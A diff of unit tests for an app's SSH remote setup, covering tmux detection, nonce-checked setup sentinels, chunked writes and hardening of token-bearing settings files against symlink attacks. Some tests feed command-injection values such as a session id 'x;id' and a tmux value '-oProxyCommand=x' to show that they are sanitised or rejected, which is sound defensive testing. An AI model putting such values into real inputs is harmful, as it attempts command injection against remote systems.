   it('includeStatusLine=false omits the statusLine stanza from the per-session settings', () => {
-    const script = generateRemoteSetupScript('sid-x', null, { includeStatusLine: false })
+    const script = generateRemoteSetupScript('sid-x', null, { includeStatusLine: false }, NONCE)
     const parts = script.split(`Object.assign({},sBase,{`)
     expect(parts.length).toBeGreaterThanOrEqual(2)
     const sesCfgLine = parts[1].split(`})`)[0]
@@ -190,7 +217,7 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   // post-upgrade connect inherits it despite the master being off (the
   // shared-file heal runs after the clone is taken).
   it('strips a legacy statusLine stanza from the sBase clone itself', () => {
-    const script = generateRemoteSetupScript('sid-x', null, { includeStatusLine: false })
+    const script = generateRemoteSetupScript('sid-x', null, { includeStatusLine: false }, NONCE)
     expect(script).toContain('delete sBase.statusLine')
     // Ordering: the sBase strip appears before the per-session settings write.
     expect(script.indexOf('delete sBase.statusLine')).toBeLessThan(script.indexOf('sesPath'))
@@ -198,15 +225,15 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
 
   it('configureRemoteSettings threads the master-switch opts through to the script', () => {
     const p = new ClaudeProvider()
-    const on = p.configureRemoteSettings('sid-x', '~/repo', null)
-    const off = p.configureRemoteSettings('sid-x', '~/repo', null, { includeStatusLine: false })
+    const on = p.configureRemoteSettings('sid-x', '~/repo', null, undefined, NONCE)
+    const off = p.configureRemoteSettings('sid-x', '~/repo', null, { includeStatusLine: false }, NONCE)
     expect(on).not.toBe(off)
   })
 
   // Built-in tools master (onboarding p6): off = empty remote mcpServers,
   // exactly like the port-0 fallback; statusline is independent of this flag.
   it('includeConductorMcp=false writes empty remote mcpServers (no built-in tools)', () => {
-    const script = generateRemoteSetupScript('sid-x', null, { includeConductorMcp: false })
+    const script = generateRemoteSetupScript('sid-x', null, { includeConductorMcp: false }, NONCE)
     const writeMatch = script.match(/fs\.writeFileSync\(mcpPath,"([^"\\]|\\.)*",\{mode:0o600,flag:'wx'\}\)/)
     expect(writeMatch).not.toBeNull()
     expect(writeMatch![0]).toContain('\\"mcpServers\\":{}')
@@ -221,7 +248,7 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
   it('writes empty mcpServers when the conductor server has not bound (port=0)', () => {
     mockedConductorMcpPort = 0
     try {
-      const script = generateRemoteSetupScript('sid-x', null)
+      const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
       const writeMatch = script.match(/fs\.writeFileSync\(mcpPath,"([^"\\]|\\.)*",\{mode:0o600,flag:'wx'\}\)/)
       expect(writeMatch).not.toBeNull()
       // Empty mcpServers literal: {"mcpServers":{}} -> doubly-stringified
@@ -243,7 +270,7 @@ describe('SSH remote setup script (P7.8 -- --mcp-config migration)', () => {
 // each was verified to fail against the pre-fix code.
 describe('SSH remote ~/.claude hardening (GHSA-phr3-g5qh-q4v5)', () => {
   it('re-asserts 0700 on the dir unconditionally, not only on mkdir create', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     // The chmod must be its own statement, so a pre-existing dir is repaired.
     expect(script).toContain('fs.chmodSync(claudeDir,0o700)')
     // And it must come before any write into the dir, so the writes land in an
@@ -252,7 +279,7 @@ describe('SSH remote ~/.claude hardening (GHSA-phr3-g5qh-q4v5)', () => {
   })
 
   it('creates BOTH token-bearing files exclusively (flag wx), refusing a re-planted link', () => {
-    const script = generateRemoteSetupScript('sid-x', null)
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
     // settings-<sid>.json (hook token) and mcp-<sid>.json (?token= secret):
     // exclusive create so a symlink planted in the rmSync->write window is
     // refused with EEXIST rather than followed.
@@ -272,5 +299,111 @@ describe('SSH remote ~/.claude hardening (GHSA-phr3-g5qh-q4v5)', () => {
       'utf8',
     )
     expect(src).not.toContain('the 0700 dir blocks a planted link')
+  })
+})
+
+// #242 finding F3 (MAJOR, adversarial review round 5): after a tier-3/4
+// stage/push succeeds, pty-manager must rewrite the ALREADY-WRITTEN
+// settings-<safeSid>.json's CCC_TMUX_BIN before the claude launch write --
+// see buildTmuxBinPatchCommand's doc comment for the full mechanism.
+//
+// #242 finding F1(a), round-2 correction: buildTmuxBinPatchCommand no longer
+// takes a `tmuxBin` parameter -- the emitted script computes
+// `path.join(os.homedir(),'.claude','bin','tmux')` itself, evaluated on the
+// REMOTE at runtime, rather than trusting a host-supplied value that
+// ultimately traces back to a wire-reported (and therefore
+// attacker-influenceable) path.
+describe('buildTmuxBinPatchCommand (#242 finding F3)', () => {
+  it('produces a base64-piped node command', () => {
+    const cmd = buildTmuxBinPatchCommand('sid-x')
+    expect(cmd).toMatch(/^echo '[A-Za-z0-9+\/=]+' \| base64 -d \| node 2>\/dev\/null$/)
+  })
+
+  it('decodes to a script that reads settings-<safeSid>.json and rewrites CCC_TMUX_BIN in place, computed from the REMOTE os.homedir()', () => {
+    const cmd = buildTmuxBinPatchCommand('sid-x')
+    const m = cmd.match(/echo '([A-Za-z0-9+\/=]+)'/)
+    expect(m).not.toBeNull()
+    const decoded = Buffer.from(m![1], 'base64').toString('utf8')
+    expect(decoded).toContain(`'settings-sid-x.json'`)
+    expect(decoded).toContain('CCC_TMUX_BIN=')
+    expect(decoded).toContain(`path.join(os.homedir(),'.claude','bin','tmux')`)
+    expect(decoded).toContain('statusLine.command')
+  })
+
+  // #242 finding I4: the computed tmuxBin is real remote output
+  // (os.homedir()), not wire-controlled, but its sibling in
+  // generateRemoteSetupScript (the `tmuxPath` guard) re-checks the identical
+  // class of value against the SAME allowlist right before the SAME sink
+  // (statusLine.command) -- this patch script must apply the SAME guard,
+  // and skip the whole patch (leaving whatever CCC_TMUX_BIN was already
+  // baked in) rather than splice an unguarded value into the sink.
+  it('applies the SAME charset guard as generateRemoteSetupScript before splicing tmuxBin into statusLine.command', () => {
+    const cmd = buildTmuxBinPatchCommand('sid-x')
+    const m = cmd.match(/echo '([A-Za-z0-9+\/=]+)'/)
+    const decoded = Buffer.from(m![1], 'base64').toString('utf8')
+    expect(decoded).toContain(`if(!/^[A-Za-z0-9_./-]+$/.test(tmuxBin))tmuxBin=''`)
+    const guardIdx = decoded.indexOf(`if(!/^[A-Za-z0-9_./-]+$/.test(tmuxBin))tmuxBin=''`)
+    const replaceIdx = decoded.indexOf('statusLine.command=')
+    expect(guardIdx).toBeGreaterThan(-1)
+    expect(replaceIdx).toBeGreaterThan(-1)
+    expect(guardIdx).toBeLessThan(replaceIdx)
+    // The replace itself is gated on a non-empty tmuxBin -- a failed guard
+    // must skip the patch entirely, not write an empty CCC_TMUX_BIN=.
+    expect(decoded).toContain(`if(tmuxBin&&s.statusLine&&typeof s.statusLine.command==='string')`)
+  })
+
+  it('sanitizes a hostile sessionId into the same safeSid form the settings filename uses', () => {
+    const cmd = buildTmuxBinPatchCommand('x;id')
+    const m = cmd.match(/echo '([A-Za-z0-9+\/=]+)'/)
+    const decoded = Buffer.from(m![1], 'base64').toString('utf8')
+    expect(decoded).toContain(`'settings-x_id.json'`)
+    expect(decoded).not.toContain('x;id')
+  })
+
+  it('is deterministic for the same input', () => {
+    expect(buildTmuxBinPatchCommand('sid-x')).toBe(
+      buildTmuxBinPatchCommand('sid-x'),
+    )
+  })
+})
+
+// #242 MAJOR: tier 1/2 tmux detection had ZERO coverage -- reverting the
+// entire hunk (dropping both probes, restoring the bare `setup ok\n`
+// sentinel) left the full suite green. Pin each piece individually.
+describe('SSH remote setup script -- tmux detection (#242)', () => {
+  it('probes PATH via the `command -v tmux` shell builtin (tier 1)', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain(`execSync('command -v tmux'`)
+  })
+
+  it('falls back to ~/.claude/bin/tmux with an X_OK access check (tier 2)', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain(`path.join(claudeDir,'bin','tmux')`)
+    expect(script).toContain('fs.constants.X_OK')
+  })
+
+  it('ends the script with the tmux-carrying sentinel, not the bare "setup ok"', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    // #242 round-3 correction (I3): the sentinel carries a fixed CLASS
+    // (`tmuxClass`), never `tmuxPath` -- there is no wire-reported path left
+    // for tier 1/2 to influence a launch command with.
+    expect(script).toContain(`process.stdout.write('setup ok ${NONCE} tmux='+tmuxClass+'`)
+    // The pre-#242 bare sentinel wrote exactly 'setup ok\n' with nothing
+    // else on the line -- assert that exact literal is gone, not merely
+    // that the new one was added alongside it.
+    expect(script).not.toContain(`process.stdout.write('setup ok\\n')`)
+  })
+})
+
+// #242 MAJOR: the statusline shim's OSC sentinel would otherwise be
+// swallowed by tmux (the pane pty needs allow-passthrough+DCS to forward an
+// unrecognised OSC to the client, which is not configured). The shim
+// instead bypasses tmux by asking the server for the attached client's tty.
+describe('SSH statusline shim -- tmux client-tty bypass (#242)', () => {
+  it('embeds a $TMUX branch that asks the tmux server for #{client_tty}', () => {
+    const script = generateRemoteSetupScript('sid-x', null, undefined, NONCE)
+    expect(script).toContain('process.env.TMUX')
+    expect(script).toContain('#{client_tty}')
+    expect(script).toContain('display-message')
   })
 })

--- a/tests/unit/pty-chunked-write.test.ts
+++ b/tests/unit/pty-chunked-write.test.ts
@@ -112,4 +112,74 @@ describe('runChunkedWrite (R-010)', () => {
     })
     expect(dones).toBe(1)
   })
+
+  // #242 tier 4: onProgress is how pty-manager surfaces the ~1.27 MB
+  // tmux-push transfer's progress via emitSshFlowState('running-setup',
+  // 'staging tmux NN%') with zero new IPC channels. Mutation to prove this
+  // can fail: comment out the `hooks.onProgress?.(offset, total)` call in
+  // runChunkedWrite — progressCalls.length stays 0 and this test fails,
+  // without touching any of the liveness/crash-safety cases above.
+  it('calls onProgress with monotonically non-decreasing byte counts ending at data.length', () => {
+    const data = 'p'.repeat(1000)
+    const progressCalls: Array<[number, number]> = []
+    runChunkedWrite(data, {
+      write: () => {},
+      isAlive: () => true,
+      schedule: syncSchedule,
+      chunkSize: 256,
+      onProgress: (sent, total) => progressCalls.push([sent, total]),
+    })
+    // 1000 / 256 = ceil → 4 chunks → 4 progress calls, one per chunk.
+    expect(progressCalls).toHaveLength(4)
+    expect(progressCalls.every(([, total]) => total === data.length)).toBe(true)
+    const sentCounts = progressCalls.map(([sent]) => sent)
+    for (let i = 1; i < sentCounts.length; i++) {
+      expect(sentCounts[i]).toBeGreaterThanOrEqual(sentCounts[i - 1])
+    }
+    expect(sentCounts[sentCounts.length - 1]).toBe(data.length)
+  })
+
+  // onProgress must reflect only bytes that ACTUALLY landed — a caller
+  // computing a percentage from it must never see a total that outruns
+  // reality when the session dies mid-transfer.
+  it('stops calling onProgress once the session dies mid-write (never reports past the last real chunk)', () => {
+    const data = 'q'.repeat(1000)
+    const progressCalls: number[] = []
+    let alive = true
+    runChunkedWrite(data, {
+      write: () => {},
+      isAlive: () => alive,
+      schedule: syncSchedule,
+      chunkSize: 256,
+      // Kill the session right after chunk 1's progress is reported —
+      // chunk 2's liveness check (which runs BEFORE its write/onProgress)
+      // then bails, so exactly one progress call total.
+      onProgress: (sent) => { progressCalls.push(sent); alive = false },
+    })
+    expect(progressCalls).toEqual([256])
+  })
+
+  // #242 round-3 MINOR fix: onProgress is a NEW un-absorbed call on this
+  // setTimeout-driven path (module doc comment: nothing may throw out of the
+  // timer callback, because the global uncaughtException handler re-throws
+  // and kills main). Mutation to prove this can fail: remove the try/catch
+  // around `hooks.onProgress?.(offset, total)` in runChunkedWrite -- the
+  // throw then propagates out of writeNext() and this test's `.not.toThrow()`
+  // fails, without touching any of the liveness/crash-safety cases above.
+  it('a throwing onProgress hook is swallowed and does not abort the write', () => {
+    const written: string[] = []
+    expect(() =>
+      runChunkedWrite('r'.repeat(600), {
+        write: (s) => written.push(s),
+        isAlive: () => true,
+        schedule: syncSchedule,
+        chunkSize: 256,
+        onProgress: () => { throw new Error('progress hook boom') },
+      }),
+    ).not.toThrow()
+    // All 3 chunks (600 / 256 → ceil = 3) still landed -- the throwing hook
+    // degraded progress reporting only, not the write itself.
+    expect(written.join('')).toBe('r'.repeat(600))
+    expect(written).toHaveLength(3)
+  })
 })

--- a/tests/unit/pty-manager-ssh-tmux.test.ts
+++ b/tests/unit/pty-manager-ssh-tmux.test.ts
@@ -1,0 +1,1719 @@
+// tests/unit/pty-manager-ssh-tmux.test.ts
+//
+// #242 call-site guard, modeled on pty-manager-ssh-argv.test.ts. That file
+// asserts the SSH connection argv reaches buildSshConnectionArgs; this
+// asserts writeClaudeCmd actually WRAPS the claude launch in tmux once
+// detection reports a binary, and leaves it bare when it doesn't. Without
+// this, reverting writeClaudeCmd to always write the bare claudeCmd (or
+// reverting the sentinel parse) leaves the rest of the suite green.
+//
+// #242 finding F1 (adversarial review round 5, BLOCKER): every sentinel this
+// file feeds now REQUIRES the real per-session nonce spawnPty generates
+// (`_getSshNonceForTest`) -- see `nonceSentinel` below. Tests that
+// deliberately probe the spoofing attack (a sentinel with NO nonce, or the
+// WRONG one) feed the literal text directly instead.
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+
+vi.mock('os', async (importOriginal) => ({
+  ...(await importOriginal<typeof import('os')>()),
+  platform: () => 'linux',
+}))
+
+// Collects EVERY onData listener pty-manager registers, not just the last
+// one -- node-pty's real onData supports multiple independent listeners
+// (pty-manager itself registers a second one for debug-capture, further
+// down in spawnPty), so a mock that stores only the latest silently feeds
+// synthetic PTY output to the WRONG handler. Feeding a chunk below dispatches
+// to all of them, matching real node-pty semantics.
+const onDataListeners: Array<(data: string) => void> = []
+function feedPtyData(chunk: string): void {
+  for (const cb of onDataListeners) cb(chunk)
+}
+// #242 round-3 MAJOR fix: the staging write is now base64-wrapped (see
+// buildTmuxStageCommand in ssh-tmux-stage.ts), so it no longer contains the
+// literal 'ccc-tmux-stage' substring the round-2 tests matched on -- that
+// substring only ever exists in the DECODED script and in the remote's
+// eventual sentinel *reply* (fed back via feedPtyData, simulating real PTY
+// output), never in the outgoing write itself. Detect the outgoing staging
+// write by its fixed wrapper shape instead: it pipes through `base64 -d |
+// sh`, while the host/container setup write (also base64-wrapped) pipes
+// through `base64 -d | node` -- the interpreter name distinguishes them.
+function isStagingWrite(arg: unknown): boolean {
+  return typeof arg === 'string' && arg.includes('base64 -d | sh')
+}
+
+// #242 tier-4 test helpers. The push transfer is driven through
+// runChunkedWrite at WRITE_CHUNK_SIZE(256B), so any single ptyProcess.write()
+// call during a push is an arbitrary 256-char SLICE of the whole multi-line
+// command -- a marker string (e.g. 'PUSH_ACCUMULATOR_PATH') can land split
+// across two consecutive calls. Concatenating every write this session has
+// made so far and searching THAT is the only reliable way to detect push
+// activity; a per-call `.some()` check (fine for tier 3's single big write)
+// would silently miss split markers here.
+function allWrittenSoFar(): string {
+  return writeMock.mock.calls.map((c) => (typeof c[0] === 'string' ? c[0] : '')).join('')
+}
+function pushActivityDetected(): boolean {
+  return allWrittenSoFar().includes('PUSH_ACCUMULATOR_PATH')
+}
+/** Yield control so a resolved-but-not-yet-run `.then()` callback (the
+ *  tier-4 archive resolver's promise) gets a chance to execute before the
+ *  test keeps going. Promise microtasks are not controlled by vi's fake
+ *  timers, so this needs a real await, not a timer advance. */
+async function flushMicrotasks(): Promise<void> {
+  await Promise.resolve()
+  await Promise.resolve()
+}
+
+/**
+ * #242 finding F2 regression helper. Simulates the one piece of remote TTY
+ * canonical-mode line-discipline behaviour this test needs: a Ctrl-C
+ * (`\x03`) discards the current, not-yet-terminated input line -- everything
+ * typed since the last `\r`/`\n` -- the same way a real terminal driver
+ * flushes pending input on SIGINT. Used ONLY to verify the fix: sending
+ * `\x03` before the recovery text must discard the dangling single-quote an
+ * aborted `echo '<base64...` chunk write left open, so the recovery command
+ * (and the eventual claude launch) land as real shell text instead of
+ * literal string content inside that still-open quote.
+ */
+function applyLineDiscipline(text: string): string {
+  let buf = ''
+  for (const ch of text) {
+    if (ch === '\x03') {
+      const lastBreak = Math.max(buf.lastIndexOf('\r'), buf.lastIndexOf('\n'))
+      buf = buf.slice(0, lastBreak + 1)
+    } else {
+      buf += ch
+    }
+  }
+  return buf
+}
+
+const writeMock = vi.fn()
+const spawnMock = vi.fn(() => ({
+  onData: (cb: (data: string) => void) => {
+    onDataListeners.push(cb)
+  },
+  onExit: () => {},
+  write: writeMock,
+  kill: () => {},
+  pid: 123,
+}))
+vi.mock('node-pty', () => ({ spawn: spawnMock }))
+vi.mock('electron', () => ({
+  BrowserWindow: class {},
+  nativeTheme: { shouldUseDarkColors: false, on: () => {} },
+  app: { getPath: () => '/tmp' },
+}))
+
+const { spawnPty, getSshFlow, killPty, parseTmuxSentinel, parseTmuxStageSentinel, _setTmuxArchiveResolverForTest, _getSshNonceForTest, _getSetupLineBufferLenForTest } = await import('../../src/main/pty-manager')
+const { registerProvider } = await import('../../src/main/providers')
+const { ClaudeProvider } = await import('../../src/main/providers/claude')
+// Pure module, no node-pty/electron deps -- safe to import directly (unlike
+// pty-manager, this one is not mocked/stubbed above).
+const { buildTmuxStageCommand, TMUX_STAGE_SHA256 } = await import('../../src/main/ssh-tmux-stage')
+// #242 round-3 correction (I3): the two fixed literal tokens
+// buildTmuxLaunchCommand picks between -- tests assert against THESE
+// constants rather than hardcoding the literal strings, so a future change
+// to either token doesn't silently desync the test expectations from the
+// real value.
+const { ON_PATH_TMUX_BIN_EXPR, STAGED_TMUX_BIN_EXPR } = await import('../../src/main/ssh-tmux')
+registerProvider(new ClaudeProvider())
+
+const fakeWin = { webContents: { send: () => {} }, isDestroyed: () => false } as never
+const SSH = { username: 'dev', host: 'box.example.com', port: 2222, remotePath: '~' }
+
+/**
+ * #242 finding F1 (b): substitute the literal placeholder "{NONCE}" in a
+ * sentinel TEMPLATE with the REAL per-session nonce spawnPty generated for
+ * `sessionId` (read via the test-only `_getSshNonceForTest` accessor) -- so
+ * these tests drive the REAL flow with a genuinely nonce-carrying sentinel,
+ * exactly the shape the real setup/stage/push scripts produce, rather than
+ * a value this suite invents. Throws loudly if called before spawnPty has
+ * registered a nonce for this session, instead of silently feeding
+ * "{NONCE}" through unreplaced (which would just as silently fail to match
+ * any parser and mask a real bug in the test itself).
+ */
+function nonceSentinel(sessionId: string, template: string): string {
+  const nonce = _getSshNonceForTest(sessionId)
+  if (nonce === undefined) throw new Error(`nonceSentinel: no nonce registered for session ${sessionId} -- spawnPty must run first`)
+  return template.replace('{NONCE}', nonce)
+}
+
+/**
+ * Drive the manual SSH flow past host setup and into writeClaudeCmd:
+ * launchClaude() (writes setup after a 200ms delay) -> feed the sentinel
+ * chunk -> advance past the 1.5s idle-fallback that chains to
+ * writeClaudeCmd -> advance past its own 200ms write delay.
+ *
+ * `sentinelTemplate` may contain the literal placeholder "{NONCE}" -- if it
+ * does, it is substituted with this session's REAL nonce before being fed;
+ * tests that deliberately probe the spoofing attack (no nonce present at
+ * all, or a stale/wrong one) pass a template with no placeholder, or one
+ * containing a nonce that does NOT match, so it is fed completely verbatim.
+ */
+function driveToClaudeWrite(sessionId: string, sentinelTemplate: string): void {
+  onDataListeners.length = 0
+  spawnPty(fakeWin, sessionId, { ssh: SSH } as never)
+  writeMock.mockClear()
+  getSshFlow(sessionId)!.launchClaude()
+  vi.advanceTimersByTime(300) // past writeHostSetupCmd's 200ms setup write
+  feedPtyData(sentinelTemplate.includes('{NONCE}') ? nonceSentinel(sessionId, sentinelTemplate) : sentinelTemplate)
+  vi.advanceTimersByTime(1500) // idle fallback: setupDone -> proceedAfterSetup
+  vi.advanceTimersByTime(300) // writeClaudeCmd's OR writeTmuxStageCmd's own 200ms write delay
+  // #242 tier 3: a tmux=none/hostile/truncated sentinel now routes through
+  // the curl/wget staging step before claude, instead of writing claudeCmd
+  // directly. Resolve it with a fail sentinel so this helper still lands
+  // on the eventual claude write either way -- the dedicated tier-3
+  // describe block below covers the staging step itself in detail.
+  if (writeMock.mock.calls.some((c) => isStagingWrite(c[0]))) {
+    feedPtyData(nonceSentinel(sessionId, 'ccc-tmux-stage {NONCE} fail=test\r\n'))
+    vi.advanceTimersByTime(300)
+  }
+}
+
+describe('spawnPty SSH branch — writeClaudeCmd tmux wrapping (#242)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  it('wraps claudeCmd in tmux new-session -A when the setup sentinel reports tmux=path (tier 1, found on PATH)', () => {
+    driveToClaudeWrite('s-tmux-hit', 'setup ok {NONCE} tmux=path\r\n')
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    expect(written).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-s-tmux-hit`)
+    expect(written).toContain('claude ')
+  })
+
+  // #242 round-3 correction (I3): tier 2 (a pre-existing ~/.claude/bin/tmux)
+  // shares the SAME fixed launch token as tier 3/4 -- STAGED_TMUX_BIN_EXPR --
+  // since all three install/detect at the identical remote location.
+  it('wraps claudeCmd in tmux new-session -A when the setup sentinel reports tmux=home (tier 2, pre-existing ~/.claude/bin/tmux)', () => {
+    driveToClaudeWrite('s-tmux-home', 'setup ok {NONCE} tmux=home\r\n')
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    expect(written).toContain(`${STAGED_TMUX_BIN_EXPR} new-session -A -s ccc-s-tmux-home`)
+    expect(written).toContain('claude ')
+  })
+
+  it('writes the bare claudeCmd (no tmux) when the sentinel reports tmux=none', () => {
+    driveToClaudeWrite('s-tmux-miss', 'setup ok {NONCE} tmux=none\r\n')
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    const written = claudeWrite![0] as string
+    // Not a substring check for the literal "tmux" -- the sessionId itself
+    // (s-tmux-miss) legitimately appears inside --settings/--mcp-config
+    // paths regardless of wrapping. Assert the WRAPPER shape is absent and
+    // the claude invocation is not embedded inside a single-quoted argument
+    // (which is how the tmux wrap would present it).
+    expect(written).not.toMatch(/new-session\s+-A\s+-s/)
+    expect(written).not.toContain(`'`)
+    expect(written).toContain('claude ')
+  })
+
+  // #242 round-3 correction (I3): the tmux= field is now a fixed 3-way enum
+  // (path|home|none) -- there is no longer a captured free-text value for a
+  // hostile/option-like/metacharacter-bearing input to reach the launch
+  // command with at all (that whole class of finding is closed by
+  // construction, not by a stronger validator). A value outside the enum
+  // simply fails the sentinel regex -- indistinguishable from "not present
+  // in this chunk yet" -- so setup does not complete from that data, and
+  // nothing is written. What still matters here: this must not throw out of
+  // a setTimeout callback (armIdleFallback / writeClaudeCmd's own 200ms
+  // write), which would crash main via the global uncaughtException handler
+  // (#188 shape), and the flow must still degrade safely (to the setup
+  // timeout's 'failed' state) rather than hanging forever.
+  it('does not throw and does not latch setup completion when the sentinel carries an out-of-enum tmux value', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-tmux-hostile', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-tmux-hostile')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    for (const hostile of ['-oProxyCommand=x', '/usr/bin/tmux;id', '/usr/bin/tmux']) {
+      expect(() => feedPtyData(nonceSentinel('s-tmux-hostile', `setup ok {NONCE} tmux=${hostile}\r\n`))).not.toThrow()
+    }
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    // The genuine setup timeout still fires safely, degrading to 'failed'
+    // rather than hanging or crashing -- none of the garbage above ever
+    // counted as a real completion.
+    vi.advanceTimersByTime(10000) // SETUP_TIMEOUT_MS
+    expect(getSshFlow('s-tmux-hostile')!.getState().state).toBe('failed')
+  })
+})
+
+// #242 finding I1 (BLOCKER-equivalent live-feature bug): a real SSH link
+// routinely segments a single logical line across multiple PTY chunks.
+// parseTmuxSentinel's chunk-boundary discipline correctly refuses to match
+// a truncated read off the FIRST chunk alone -- but before the fix, nothing
+// ever re-parsed the SECOND chunk, because the (pre-fix) completion latch
+// was a bare substring check that had already fired off chunk 1 alone
+// (chunk 1 already contains the literal text "setup ok"). The fix buffers
+// the accumulated line per session (`bufferSetupLine`) and re-parses the
+// COMBINED text on every chunk until it resolves.
+//
+// Mutation to prove each test below can fail: revert the host-setup-ok
+// handler in pty-manager.ts to parse `data` (the current chunk alone)
+// instead of the buffered `combined` text -- every assertion below then
+// fails, because chunk 2 alone (e.g. "th\r\n") never matches
+// `setup ok <nonce> tmux=...` on its own, and detectedTmuxSource stays
+// null (bare launch) instead of getting tmux-wrapped.
+describe('spawnPty SSH branch — sentinel split across PTY chunks (#242 finding I1)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  function driveHostSetupOnly(sessionId: string): void {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, sessionId, { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow(sessionId)!.launchClaude()
+    vi.advanceTimersByTime(300) // past writeHostSetupCmd's 200ms setup write
+  }
+
+  function finishAndGetClaudeWrite(): string {
+    vi.advanceTimersByTime(1500) // idle fallback: setupDone -> proceedAfterSetup
+    vi.advanceTimersByTime(300) // writeClaudeCmd's own 200ms write delay
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    return claudeWrite![0] as string
+  }
+
+  // The exact non-adversarial repro this finding was filed against: the
+  // chunk boundary lands INSIDE the tmux= class token itself.
+  it('still wraps in tmux when the tmux= class token is split across two chunks', () => {
+    const sessionId = 's-i1-split-value'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    feedPtyData(`setup ok ${nonce} tmux=pa`)
+    feedPtyData(`th\r\n`)
+    const written = finishAndGetClaudeWrite()
+    expect(written).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
+  it('still wraps in tmux when the chunk boundary lands mid-nonce', () => {
+    const sessionId = 's-i1-split-nonce'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    const mid = Math.floor(nonce.length / 2)
+    feedPtyData(`setup ok ${nonce.slice(0, mid)}`)
+    feedPtyData(`${nonce.slice(mid)} tmux=home\r\n`)
+    const written = finishAndGetClaudeWrite()
+    expect(written).toContain(`${STAGED_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
+  it('still wraps in tmux across a three-way split of the sentinel line', () => {
+    const sessionId = 's-i1-split-three'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    feedPtyData(`setup ok `)
+    feedPtyData(`${nonce} tmux=pa`)
+    feedPtyData(`th\r\n`)
+    const written = finishAndGetClaudeWrite()
+    expect(written).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
+  // A chunk that never arrives with the terminating newline must still
+  // degrade safely (setup timeout -> 'failed'), not hang forever or throw --
+  // the buffer is bounded (MAX_SETUP_LINE_BUFFER), not an unbounded
+  // accumulation.
+  it('degrades safely to the setup timeout when the second half of the line never arrives', () => {
+    const sessionId = 's-i1-never-completes'
+    driveHostSetupOnly(sessionId)
+    feedPtyData(nonceSentinel(sessionId, 'setup ok {NONCE} tmux=pa'))
+    vi.advanceTimersByTime(10000) // SETUP_TIMEOUT_MS
+    expect(writeMock.mock.calls.some((c) => typeof c[0] === 'string' && c[0].includes('claude '))).toBe(false)
+    expect(getSshFlow(sessionId)!.getState().state).toBe('failed')
+  })
+
+  // ROUND-2 MAJOR regression this finding was filed against: an earlier
+  // `bufferSetupLine` capped the string it RETURNED for parsing (not just
+  // the string it RETAINED for next time) at MAX_SETUP_LINE_BUFFER -- so a
+  // COMPLETE, correctly-nonced sentinel followed by more than the cap's
+  // worth of trailing bytes in the SAME chunk got silently dropped from the
+  // parsed text, and the session never latched setupDone at all (ended
+  // 'failed' with no claude write, not even the bare launch). This test
+  // proves the genuine sentinel still resolves even with a large trailing
+  // tail in the same chunk. Mutation to prove it can fail: reintroduce the
+  // cap on the RETURNED value in bufferSetupLine (e.g. slice `combined`
+  // itself before returning it) -- this then ends 'failed' with no write.
+  it('still wraps in tmux when the genuine sentinel is followed by more than the buffer cap worth of trailing bytes in the SAME chunk', () => {
+    const sessionId = 's-i1-trailing-overflow'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    // 4096 mirrors MAX_SETUP_LINE_BUFFER in pty-manager.ts (not exported).
+    feedPtyData(`setup ok ${nonce} tmux=path\r\n` + 'y'.repeat(4096 + 1))
+    const written = finishAndGetClaudeWrite()
+    expect(written).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
+  // Isolating control for the test above: comfortably UNDER the cap, this
+  // always worked, even pre-fix -- proves the overflow test isn't passing
+  // for some unrelated reason.
+  it('control: still wraps in tmux with trailing bytes comfortably under the buffer cap', () => {
+    const sessionId = 's-i1-trailing-under-cap'
+    driveHostSetupOnly(sessionId)
+    const nonce = _getSshNonceForTest(sessionId)!
+    feedPtyData(`setup ok ${nonce} tmux=path\r\n` + 'y'.repeat(1000))
+    const written = finishAndGetClaudeWrite()
+    expect(written).toContain(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-${sessionId}`)
+  })
+
